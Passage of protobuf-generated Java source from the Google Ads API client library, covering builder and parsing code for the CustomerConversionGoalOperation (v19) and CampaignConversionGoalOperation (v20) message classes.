com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v19.services.CustomerConversionGoalOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (update) on a customer conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.CustomerConversionGoalOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v19.services.CustomerConversionGoalOperation) com.google.ads.googleads.v19.services.CustomerConversionGoalOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CustomerConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.class, com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.Builder.class); } // Construct using com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } if (updateBuilder_ != null) { updateBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v19.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v19.services.CustomerConversionGoalOperation getDefaultInstanceForType() { return com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v19.services.CustomerConversionGoalOperation build() { com.google.ads.googleads.v19.services.CustomerConversionGoalOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v19.services.CustomerConversionGoalOperation buildPartial() { com.google.ads.googleads.v19.services.CustomerConversionGoalOperation result = new com.google.ads.googleads.v19.services.CustomerConversionGoalOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v19.services.CustomerConversionGoalOperation result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v19.services.CustomerConversionGoalOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && updateBuilder_ != null) { result.operation_ = updateBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v19.services.CustomerConversionGoalOperation) { return mergeFrom((com.google.ads.googleads.v19.services.CustomerConversionGoalOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v19.services.CustomerConversionGoalOperation other) { if (other == com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.getDefaultInstance()) return this; if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } switch (other.getOperationCase()) { case UPDATE: { mergeUpdate(other.getUpdate()); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getUpdateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { input.readMessage( getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask( com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000001); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000001; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.CustomerConversionGoal, com.google.ads.googleads.v19.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v19.resources.CustomerConversionGoalOrBuilder> updateBuilder_; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v19.resources.CustomerConversionGoal getUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance(); } else { if (operationCase_ == 1) { return updateBuilder_.getMessage(); } return com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ public Builder setUpdate(com.google.ads.googleads.v19.resources.CustomerConversionGoal value) { if (updateBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { updateBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ public Builder setUpdate( com.google.ads.googleads.v19.resources.CustomerConversionGoal.Builder builderForValue) { if (updateBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { updateBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ public Builder mergeUpdate(com.google.ads.googleads.v19.resources.CustomerConversionGoal value) { if (updateBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance()) { operation_ = com.google.ads.googleads.v19.resources.CustomerConversionGoal.newBuilder((com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { updateBuilder_.mergeFrom(value); } else { updateBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ public Builder clearUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } updateBuilder_.clear(); } return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ public com.google.ads.googleads.v19.resources.CustomerConversionGoal.Builder getUpdateBuilder() { return getUpdateFieldBuilder().getBuilder(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.CustomerConversionGoalOrBuilder getUpdateOrBuilder() { if ((operationCase_ == 1) && (updateBuilder_ != null)) { return updateBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.CustomerConversionGoal, com.google.ads.googleads.v19.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v19.resources.CustomerConversionGoalOrBuilder> getUpdateFieldBuilder() { if (updateBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance(); } updateBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.CustomerConversionGoal, com.google.ads.googleads.v19.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v19.resources.CustomerConversionGoalOrBuilder>( (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return updateBuilder_; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v19.services.CustomerConversionGoalOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v19.services.CustomerConversionGoalOperation) private static final com.google.ads.googleads.v19.services.CustomerConversionGoalOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v19.services.CustomerConversionGoalOperation(); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CustomerConversionGoalOperation> PARSER = new com.google.protobuf.AbstractParser<CustomerConversionGoalOperation>() { @java.lang.Override public CustomerConversionGoalOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CustomerConversionGoalOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CustomerConversionGoalOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v19.services.CustomerConversionGoalOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,941
google-ads-stubs-v20/src/main/java/com/google/ads/googleads/v20/services/CampaignConversionGoalOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v20/services/campaign_conversion_goal_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v20.services; /** * <pre> * A single operation (update) on a campaign conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.CampaignConversionGoalOperation} */ public final class CampaignConversionGoalOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v20.services.CampaignConversionGoalOperation) CampaignConversionGoalOperationOrBuilder { private static final long serialVersionUID = 0L; // Use CampaignConversionGoalOperation.newBuilder() to construct. private CampaignConversionGoalOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CampaignConversionGoalOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CampaignConversionGoalOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CampaignConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.class, com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.Builder.class); } private int bitField0_; private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { UPDATE(1), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return UPDATE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } public static final int UPDATE_FIELD_NUMBER = 1; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v20.resources.CampaignConversionGoal getUpdate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.CampaignConversionGoalOrBuilder getUpdateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance(); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v20.services.CampaignConversionGoalOperation)) { return super.equals(obj); } com.google.ads.googleads.v20.services.CampaignConversionGoalOperation other = (com.google.ads.googleads.v20.services.CampaignConversionGoalOperation) obj; if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask() .equals(other.getUpdateMask())) return false; } if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getUpdate() .equals(other.getUpdate())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } switch (operationCase_) { case 1: hash = (37 * hash) + UPDATE_FIELD_NUMBER; hash = (53 * hash) + getUpdate().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v20.services.CampaignConversionGoalOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (update) on a campaign conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.CampaignConversionGoalOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v20.services.CampaignConversionGoalOperation) com.google.ads.googleads.v20.services.CampaignConversionGoalOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CampaignConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.class, com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.Builder.class); } // Construct using com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } if (updateBuilder_ != null) { updateBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v20.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v20.services.CampaignConversionGoalOperation getDefaultInstanceForType() { return com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v20.services.CampaignConversionGoalOperation build() { com.google.ads.googleads.v20.services.CampaignConversionGoalOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v20.services.CampaignConversionGoalOperation buildPartial() { com.google.ads.googleads.v20.services.CampaignConversionGoalOperation result = new com.google.ads.googleads.v20.services.CampaignConversionGoalOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v20.services.CampaignConversionGoalOperation result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v20.services.CampaignConversionGoalOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && updateBuilder_ != null) { result.operation_ = updateBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( 